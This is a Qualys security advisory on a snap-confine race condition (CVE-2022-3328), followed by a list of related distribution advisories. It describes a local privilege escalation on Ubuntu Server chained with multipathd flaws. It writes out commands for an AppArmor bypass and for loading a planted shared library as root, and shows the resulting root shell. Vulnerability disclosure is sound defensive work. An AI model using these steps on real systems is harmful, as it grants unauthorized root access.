Headline
snap-confine must_mkdir_and_open_with_perms() Race Condition
Qualys discovered a race condition (CVE-2022-3328) in snap-confine, a SUID-root program installed by default on Ubuntu. In this advisory,they tell the story of this vulnerability (which was introduced in February 2022 by the patch for CVE-2021-44731) and detail how they exploited it in Ubuntu Server (a local privilege escalation, from any user to root) by combining it with two vulnerabilities in multipathd (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973).
Qualys Security AdvisoryRace condition in snap-confine's must_mkdir_and_open_with_perms()(CVE-2022-3328)========================================================================Contents========================================================================SummaryBackgroundExploitationAcknowledgmentsTimeline I can't help but feel a missed opportunity to integrate lyrics from one of the best songs ever: [SNAP! - The Power (Official Video)] -- https://twitter.com/spendergrsec/status/1494420041076461570========================================================================Summary========================================================================We discovered a race condition (CVE-2022-3328) in snap-confine, aSUID-root program installed by default on Ubuntu. In this advisory, wetell the story of this vulnerability (which was introduced in February2022 by the patch for CVE-2021-44731) and detail how we exploited it inUbuntu Server (a local privilege escalation, from any user to root) bycombining it with two vulnerabilities in multipathd (an authorizationbypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt========================================================================Background======================================================================== Like the crack of the whip, I Snap! attack Radical mind, day and night all the time -- SNAP! - The PowerIn February 2022, we published CVE-2021-44731 in our "Lemmings" advisory(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):to set up a snap's sandbox, snap-confine created the temporary directory/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it didnot belong to root; a local attacker could race against snap-confine,retain control over /tmp/snap.$SNAP_NAME, and eventually obtain fullroot privileges.This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:Prevent user-controlled race in setup_private_mount"), which introduceda new helper function, must_mkdir_and_open_with_perms():------------------------------------------------------------------------142 static void setup_private_mount(const char *snap_name)...169 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);...176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);------------------------------------------------------------------------ 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid, 56 mode_t mode) .. 61 mkdir: .. 67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) { .. 70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW); .. 81 if (fstat(fd, &st) < 0) { .. 84 if (st.st_uid != uid || st.st_gid != gid 85 || st.st_mode != (S_IFDIR | mode)) {...130 if (rename(dir, random_dir) < 0) {...135 goto mkdir;------------------------------------------------------------------------- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if it does not exist already;- if it already exists, and if it does not belong to root (at line 84), then it is moved out of the way (at line 130) by rename()ing it to a random directory in /tmp, and its creation is retried (at line 135).When we reviewed this patch back in December 2021, we felt very nervousabout this rename() call (because it allows a local attacker to rename()a directory they do not own), and we advised the Ubuntu Security Team toeither not reuse the directory /tmp/snap.$SNAP_NAME at all, or to createit in a non-world-writable directory instead of /tmp, or at least to userenameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all ofthese ideas were deemed impractical (for example, renameat2() is notsupported by older kernel and glibc versions); moreover, we (Qualys)failed to come up with a feasible attack plan against this rename()call, so the patch was kept in its current form.After the release of Ubuntu 22.04 in April 2022, we decided to revisitsnap-confine and its recent hardening changes, and we finally found away to exploit the rename() call in must_mkdir_and_open_with_perms().========================================================================Exploitation======================================================================== It's getting, it's getting, it's getting kinda heavy It's getting, it's getting, it's getting kinda hectic -- SNAP! - The PowerThe three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:1/ snap-confine operates in /tmp to create a snap's temporary directory(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX insc_bootstrap_mount_namespace(), where all of the Xs are randomized bymkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snapinstance name by sc_instance_name_validate() (when all of the Xs arelowercase alphanumeric):------------------------------------------------------------------------286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)...288 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";...291 if (mkdtemp(scratch_dir) == NULL) {...303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);...319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,...331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;...342 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,343 mnt->path);...352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,------------------------------------------------------------------------2/ We therefore execute two instances of snap-confine in parallel:- we block the first snap-confine immediately after it creates its root directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this race condition by "single-stepping" snap-confine, as explained in our "Lemmings" advisory);- we execute the second snap-confine with a snap instance name of rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX of the first snap-confine;- we kill this second snap-confine immediately after it rename()s its temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we reliably win this race condition with inotify, as explained in our "Lemmings" advisory);- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and resume the execution of the first snap-confine, whose root directory now belongs to us.3/ We can therefore create an arbitrary symlink/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() willbind-mount the real /tmp directory (which is world-writable) onto anydirectory in the filesystem (because mount() will follow our arbitrarysymlink at line 352).This ability will eventually allow us to obtain full root privileges,but we must first solve three problems:------------------------------------------------------------------------Problem a/ We cannot trick snap-confine into rename()ing/tmp/snap.rootfs_XXXXXX, because this directory belongs to root andmust_mkdir_and_open_with_perms() rename()s it only if it does not belongto root!This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXXbelongs to the user root, but it belongs to the group of our own user,so must_mkdir_and_open_with_perms() rename()s it because it does notbelong to the group root (at line 84).------------------------------------------------------------------------Problem b/ We cannot trick snap-confine into following our symlink/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line319): if we create our symlink before this bind-mount, then it becomescovered by the squashfs; and we cannot create our symlink after thisbind-mount, because the squashfs is read-only and belongs to root!The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"of our "Lemmings" advisory suggests a solution to this problem: we mustunmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()bind-mounts it (at lines 303 and 319). The "(deleted)" technique we usedin "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,but we found a surprisingly simple workaround:we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediatelyafter we re-create this directory ourselves; this allows us to unmount(with fusermount -u -z) any subsequent bind-mounts (even if they belongto root), because fusermount does not check that our FUSE filesystem isindeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.------------------------------------------------------------------------Problem c/ We cannot trick snap-confine into bind-mounting the real /tmponto an arbitrary directory in the filesystem (at line 352), becausesuch a bind-mount is forbidden by snap-confine's AppArmor profile!To solve this problem, we must bypass AppArmor completely, but thetechnique we used in our "Lemmings" advisory (we wrapped snap-confine'sexecution in an AppArmor profile that was in "complain" mode, not in"enforce" mode) was patched in February 2022 (by commits 26eed65 and4a2eb78, "ensure that snap-confine is in strict confinement" and"Tighten AppArmor label check"):now, snap-confine's execution must be wrapped in an AppArmor profilethat is in "enforce" mode and whose label matches the regular expression"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".We were about to give up on trying to exploit snap-confine, when wediscovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which isinstalled by default on Ubuntu Server): these two vulnerabilities allowus to create a directory named "failed_wwids" (user root, group root,mode 0700) anywhere in the filesystem, and we were able to transformthis very limited directory creation into a complete AppArmor bypass.AppArmor supports policy namespaces that are loosely related to kerneluser namespaces; by default, no AppArmor namespaces exist:------------------------------------------------------------------------$ ls -la /sys/kernel/security/apparmor/policy/namespacestotal 0drwxr-xr-x 2 root root 0 Aug 6 12:42 .drwxr-xr-x 5 root root 0 Aug 6 12:42 ..------------------------------------------------------------------------However, we (attackers) can create an AppArmor namespace "failed_wwids"by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:------------------------------------------------------------------------$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath$ multipathd list devices | grep 'whitelisted, unmonitored' sda1 devnode whitelisted, unmonitored ...$ multipathd list list path sda1fail$ ls -la /sys/kernel/security/apparmor/policy/namespacestotal 0drwxr-xr-x 3 root root 0 Aug 6 12:42 .drwxr-xr-x 5 root root 0 Aug 6 12:42 ..drwx------ 5 root root 0 Aug 6 13:38 failed_wwids------------------------------------------------------------------------Then, we can enter this AppArmor namespace by creating and entering anunprivileged user namespace:------------------------------------------------------------------------$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh------------------------------------------------------------------------Inside this namespace, we can create an AppArmor profile labeled"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows allpossible operations:------------------------------------------------------------------------# apparmor_parser -K -a << "EOF"/usr/lib/snapd/snap-confine (enforce) {capability,network,mount,remount,umount,pivot_root,ptrace,signal,dbus,unix,file,change_profile,}EOF------------------------------------------------------------------------Back in the initial namespace, we check that our "allow all" AppArmorprofile still exists:------------------------------------------------------------------------# aa-statusapparmor module is loaded.32 profiles are loaded.32 profiles are in enforce mode. ... :failed_wwids:/usr/lib/snapd/snap-confine------------------------------------------------------------------------Last, we make sure that snap-confine accepts our "allow all" AppArmorprofile (i.e., AppArmor is bypassed, and snap-confine is effectivelyunconfined):------------------------------------------------------------------------$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent...DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confineDEBUG: apparmor mode is: enforce------------------------------------------------------------------------We can therefore bind-mount /tmp onto an arbitrary directory in thefilesystem (by exploiting CVE-2022-3328); since we already depend onmultipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,create our own shared library /lib/multipath/libchecktur.so, shutdownmultipathd (by exploiting CVE-2022-41974), restart multipathd (throughits Unix socket), and finally obtain full root privileges (becausemultipathd executes our shared library as root when it restarts):------------------------------------------------------------------------$ grep multipath /proc/self/mountinfo | wc 0 0 0$ gcc -o CVE-2022-3328 CVE-2022-3328.c$ ./CVE-2022-3328scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c$ grep multipath /proc/self/mountinfo1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw...$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c$ ps -ef | grep 'multipath[d]'root 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quitok$ ps -ef | grep 'multipath[d]' | wc 0 0 0$ ls -l /tmp/shls: cannot access '/tmp/sh': No such file or directory$ multipathd list daemonerror -104 receiving packet$ ls -l /tmp/sh-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh$ /tmp/sh -p# iduid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup) ^^^^^^^^^^^^------------------------------------------------------------------------========================================================================Acknowledgments========================================================================We thank the Ubuntu security team (Alex Murray and Seth Arnold inparticular) and the snapd team for their hard work on this snap-confinevulnerability. We also thank the members of linux-distros@openwall.========================================================================Timeline========================================================================2022-08-23: Contacted [email protected]: Contacted [email protected]: Coordinated Release Date (17:00 UTC).
Related news
Race condition in snap-confine's must_mkdir_and_open_with_perms()
Gentoo Linux Security Advisory 202401-8 - Multiple vulnerabilities have been discovered in util-linux which can lead to denial of service or information disclosure. Versions greater than or equal to 2.37.4 are affected.
Gentoo Linux Security Advisory 202311-6 - Multiple vulnerabilities have been discovered in multipath-tools, the worst of which can lead to root privilege escalation. Versions greater than or equal to 0.9.3 are affected.
Red Hat Security Advisory 2023-3356-01 - Red Hat Advanced Cluster Management for Kubernetes 2.5.9 images Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs.
Multicluster Engine for Kubernetes 2.0.9 General Availability release images, which fix security issues and update container images. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-32313: A flaw was found in the vm2. After making a vm, the inspect method is read-write for console.log, which allows an attacker to edit options for console.log. This issue impacts the integrity by changing the log subsystem. * CVE-2023-32314: A flaw was found in the vm2 sandbox. When a host o...
Red Hat Security Advisory 2023-3325-01 - Multicluster Engine for Kubernetes 2.1.7 images Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy.
Multicluster Engine for Kubernetes 2.1.7 General Availability release images, which address security issues and update container images. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-32313: A flaw was found in the vm2. After making a vm, the inspect method is read-write for console.log, which allows an attacker to edit options for console.log. This issue impacts the integrity by changing the log subsystem. * CVE-2023-32314: A flaw was found in the vm2 sandbox. When a ho...
Red Hat Security Advisory 2023-3296-01 - Multicluster Engine for Kubernetes 2.2.4 images Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy.
Multicluster Engine for Kubernetes 2.2.4 General Availability release images, which fix security issues and update container images. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-32313: A flaw was found in the vm2. After making a vm, the inspect method is read-write for console.log, which allows an attacker to edit options for console.log. This issue impacts the integrity by changing the log subsystem. * CVE-2023-32314: A flaw was found in the vm2 sandbox. When a host ...
Red Hat Security Advisory 2023-2948-01 - The device-mapper-multipath packages provide tools that use the device-mapper multipath kernel module to manage multipath devices. Issues addressed include an insecure handling vulnerability.
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41973: A vulnerability was found in the device-mapper-multipath. The device-mapper-multipath allows local users to obtain root access, in conjunction with CVE-2022-41974. Local users that are able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which may lead to controlled file writes outside of th...
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41973: A vulnerability was found in the device-mapper-multipath. The device-mapper-multipath allows local users to obtain root access, in conjunction with CVE-2022-41974. Local users that are able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which may lead to controlled file writes outside of th...
Debian Linux Security Advisory 5366-1 - The Qualys Research Labs reported an authorization bypass (CVE-2022-41974) and a symlink attack (CVE-2022-41973) in multipath-tools, a set of tools to drive the Device Mapper multipathing driver, which may result in local privilege escalation.
Red Hat Security Advisory 2023-0795-01 - Submariner 0.13.3 packages that fix various bugs and add various enhancements that are now available for Red Hat Advanced Cluster Management for Kubernetes version 2.6.
Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]
The maintainers of the FreeBSD operating system have released updates to remediate a security vulnerability impacting the ping module that could be potentially exploited to crash the program or trigger remote code execution. The issue, assigned the identifier CVE-2022-23093, impacts all supported versions of FreeBSD and concerns a stack-based buffer overflow vulnerability in the ping service. "
The maintainers of the FreeBSD operating system have released updates to remediate a security vulnerability impacting the ping module that could be potentially exploited to crash the program or trigger remote code execution. The issue, assigned the identifier CVE-2022-23093, impacts all supported versions of FreeBSD and concerns a stack-based buffer overflow vulnerability in the ping service. "
The maintainers of the FreeBSD operating system have released updates to remediate a security vulnerability impacting the ping module that could be potentially exploited to crash the program or trigger remote code execution. The issue, assigned the identifier CVE-2022-23093, impacts all supported versions of FreeBSD and concerns a stack-based buffer overflow vulnerability in the ping service. "
The maintainers of the FreeBSD operating system have released updates to remediate a security vulnerability impacting the ping module that could be potentially exploited to crash the program or trigger remote code execution. The issue, assigned the identifier CVE-2022-23093, impacts all supported versions of FreeBSD and concerns a stack-based buffer overflow vulnerability in the ping service. "
Debian Linux Security Advisory 5292-1 - The Qualys Research Team discovered a race condition in the snapd-confine binary which could result in local privilege escalation.
Ubuntu Security Notice 5753-1 - The Qualys Research Team discovered that a race condition existed in the snapd snap-confine binary when preparing the private /tmp mount for a snap. A local attacker could possibly use this issue to escalate privileges and execute arbitrary code.
Ubuntu Security Notice 5731-1 - It was discovered that multipath-tools incorrectly handled symlinks. A local attacker could possibly use this issue, in combination with other issues, to escalate privileges. This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10. It was discovered that multipath-tools incorrectly handled access controls. A local attacker could possibly use this issue, in combination with other issues, to escalate privileges.
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3787: device-mapper-multipath: Regression of CVE-2022-41974 fix in Red Hat Enterprise Linux
Red Hat Security Advisory 2022-7928-01 - The device-mapper-multipath packages provide tools that use the device-mapper multipath kernel module to manage multipath devices.
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3787: device-mapper-multipath: Regression of CVE-2022-41974 fix in Red Hat Enterprise Linux
The Qualys Research Team has discovered authorization bypass and symlink vulnerabilities in multipathd. The authorization bypass was introduced in version 0.7.0 and the symlink vulnerability was introduced in version 0.7.7.
The Qualys Research Team has discovered authorization bypass and symlink vulnerabilities in multipathd. The authorization bypass was introduced in version 0.7.0 and the symlink vulnerability was introduced in version 0.7.7.
multipath-tools 0.7.7 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited in conjunction with CVE-2022-41974. Local users able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which could lead to controlled file writes outside of the /dev/shm directory. This could be used indirectly for local privilege escalation to root.
Red Hat Security Advisory 2022-7185-01 - The device-mapper-multipath packages provide tools that use the device-mapper multipath kernel module to manage multipath devices. Issues addressed include a bypass vulnerability.
Red Hat Security Advisory 2022-7192-01 - The device-mapper-multipath packages provide tools that use the device-mapper multipath kernel module to manage multipath devices. Issues addressed include a bypass vulnerability.
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41974: device-mapper-multipath: Authorization bypass, multipathd daemon listens for client connections on an abstract Unix socket
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41974: device-mapper-multipath: Authorization bypass, multipathd daemon listens for client connections on an abstract Unix socket
An update for device-mapper-multipath is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-41974: device-mapper-multipath: Authorization bypass, multipathd daemon listens for client connections on an abstract Unix socket
A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.
A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.
A race condition existed in the snapd 2.54.2 snap-confine binary when preparing a private mount namespace for a snap. This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence gain privilege escalation. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1